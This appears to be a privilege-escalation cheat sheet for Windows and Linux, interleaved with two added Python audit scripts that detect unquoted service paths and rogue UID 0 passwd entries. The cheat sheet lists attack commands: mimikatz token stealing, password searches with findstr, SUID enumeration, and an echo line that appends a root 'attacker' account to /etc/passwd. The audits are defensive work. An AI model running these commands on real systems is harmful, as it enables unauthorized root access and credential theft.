Privilege Escalation is the process where a user gains higher-level permissions, usually to perform actions reserved for admins or SYSTEM.
See what privileges your user has:
whoami /priv
List automatically starting services (a common source of misconfigurations):
wmic service get name,displayname,pathname,startmode | findstr /i "Auto"
Check whether a service's binary path is unquoted (an attacker can plant an executable along the path):
sc qc ServiceName
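An audit script for the weakness the sc qc check above looks for, added here as an example (it is not part of the cheat sheet or of any tool it names). It parses the padded table that `wmic service get name,pathname,startmode` prints, flags auto-start services whose executable path contains a space but is not quoted, and prints the quoted image path a defender would set. The service names and paths are constructed samples; no live system is queried.

```python
"""Audit service image paths for the unquoted-path weakness.

Added example (not part of the cheat sheet). Parses the padded table that
`wmic service get name,pathname,startmode` prints and flags auto-start
services whose executable path contains a space but is not quoted. The rows
below are constructed samples; no live system is queried.
"""
import re
from typing import Dict, List, Optional, Tuple

# wmic pads every column to a fixed width and orders columns alphabetically;
# this helper builds sample rows with the same layout so the parser can be
# exercised offline. Service names and paths are constructed, not real.
def _row(name: str, path: str, mode: str) -> str:
    return f"{name:<14}{path:<60}{mode}"

SAMPLE_WMIC_OUTPUT = "\n".join([
    _row("Name", "PathName", "StartMode"),
    _row("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto"),
    _row("BackupAgent", r"C:\Program Files\Example Backup\agent.exe", "Auto"),
    _row("ExMon", r'"C:\Program Files\Example Monitor\monitor.exe" -service', "Auto"),
    _row("LegacyUpd", r"C:\Program Files (x86)\Legacy\updater.exe /svc", "Manual"),
])

EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def parse_wmic_table(text: str) -> List[Dict[str, str]]:
    """Split wmic's fixed-width output into dicts keyed by column name.

    Column boundaries are taken from where each header word starts, which is
    how wmic aligns the data rows underneath it.
    """
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return []
    header = lines[0]
    names = header.split()
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds: List[Tuple[int, Optional[int]]] = list(zip(starts, starts[1:] + [None]))
    return [
        {name: line[a:b].strip() for name, (a, b) in zip(names, bounds)}
        for line in lines[1:]
    ]


def executable_part(pathname: str) -> str:
    """Return the portion of an image path up to and including the .exe.

    Without a .exe we cannot tell where arguments begin, so the whole string
    is treated as the executable path.
    """
    m = EXE_RE.match(pathname)
    return m.group(1) if m else pathname


def is_unquoted_service_path(pathname: str) -> bool:
    """True when the path is not wrapped in quotes and the executable path
    contains a space, so the service manager has to guess where it ends."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    return " " in executable_part(p)


def quoted_image_path(pathname: str) -> str:
    """The remediation value: quote the executable part, keep any arguments."""
    p = pathname.strip()
    exe = executable_part(p)
    return f'"{exe}"{p[len(exe):]}'


def find_unquoted_services(text: str, auto_only: bool = True) -> List[Tuple[str, str, str]]:
    """Return (service, current path, corrected path) for each flagged service."""
    findings = []
    for row in parse_wmic_table(text):
        if auto_only and row.get("StartMode", "").lower() != "auto":
            continue
        path = row.get("PathName", "")
        if is_unquoted_service_path(path):
            findings.append((row["Name"], path, quoted_image_path(path)))
    return findings


if __name__ == "__main__":
    for name, current, fixed in find_unquoted_services(SAMPLE_WMIC_OUTPUT):
        print(f"{name}: unquoted image path\n  current: {current}\n  set to:  {fixed}")
```

To run it against a real host, capture the wmic output to a file and pass its contents to find_unquoted_services; the corrected string it prints is the value to put back into the service's image path, after which sc qc should show the path wrapped in quotes.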
Find scheduled tasks where you might have write access:
schtasks /query /fo LIST /v
Look for files/folders with weak ACLs (that you can modify):
icacls C:\Path\To\FileOrFolder
PowerShell module to find misconfigurations automatically:
Import-Module .\PowerUp.ps1; Invoke-AllChecks
Search for passwords inside common file types:
findstr /si password *.txt *.ini *.xml
Steal another user's token and impersonate:
mimikatz privilege::debug token::elevate
See what commands you can run with sudo without password:
sudo -l
SUID files run as the file owner (often root):
find / -perm -4000 2>/dev/null
If you can write to /etc/passwd, add a root user manually:
echo 'attacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
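An audit script for the /etc/passwd technique above, added here as an example (it is not part of the cheat sheet). It parses passwd-format content and reports UID 0 accounts other than root, empty password fields, password hashes stored inline instead of in /etc/shadow, malformed lines, and a file mode or owner that would let a non-root user append such a line. The sample content is constructed (the hash is a placeholder); check_passwd_file() is the only function that reads a real file, and only when you call it.

```python
"""Audit an /etc/passwd-format file for the manual root-account technique.

Added example (not part of the cheat sheet). It parses passwd content and
reports UID 0 accounts other than root, empty password fields, password
hashes stored inline instead of in /etc/shadow, malformed lines, and a file
mode or owner that would let a non-root user modify the file. The sample
below is constructed; check_passwd_file() is the only function that reads a
real file, and only when you call it.
"""
import os
import stat
from typing import List

# Constructed sample: a normal system plus one appended line of the kind
# shown above (placeholder hash, not a real credential).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backdoor:$1$xyz$placeholderhash:0:0:root:/root:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> List[str]:
    """Return one human-readable finding per suspicious line; [] when clean."""
    findings: List[str] = []
    seen_names = set()
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields, expected 7)")
            continue
        name, passwd, uid, _gid, _gecos, _home, shell = fields
        if not uid.isdigit():
            findings.append(f"line {lineno}: non-numeric UID {uid!r} for {name}")
            continue
        if name in seen_names:
            findings.append(f"line {lineno}: duplicate account name {name!r}")
        seen_names.add(name)
        if int(uid) == 0 and name != "root":
            findings.append(f"line {lineno}: {name} has UID 0 but is not root (shell {shell})")
        if passwd == "":
            findings.append(f"line {lineno}: {name} has an empty password field")
        elif passwd not in SHADOWED_OR_LOCKED:
            findings.append(f"line {lineno}: {name} stores a password hash in passwd instead of shadow")
    return findings


def mode_issues(st_mode: int) -> List[str]:
    """Permission bits that let non-root users modify the file itself."""
    issues = []
    if st_mode & stat.S_IWGRP:
        issues.append("group-writable")
    if st_mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues


def check_passwd_file(path: str = "/etc/passwd") -> List[str]:
    """Combine the permission/ownership check and the content audit for a real file."""
    st = os.stat(path)
    findings = [f"{path}: {issue} (mode {stat.S_IMODE(st.st_mode):04o})"
                for issue in mode_issues(st.st_mode)]
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected root (uid 0)")
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings += [f"{path}: {finding}" for finding in audit_passwd(fh.read())]
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) or ["no findings"]:
        print(finding)
```

On the sample the audit reports the appended line twice, once for the non-root UID 0 and once for the inline hash; a clean file produces an empty list, which makes the function easy to wire into a scheduled integrity check alongside a mode check of 0644 and root ownership.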
Privilege escalation matters to both attackers and defenders: understanding these weaknesses is what allows them to be found and fixed before they are abused.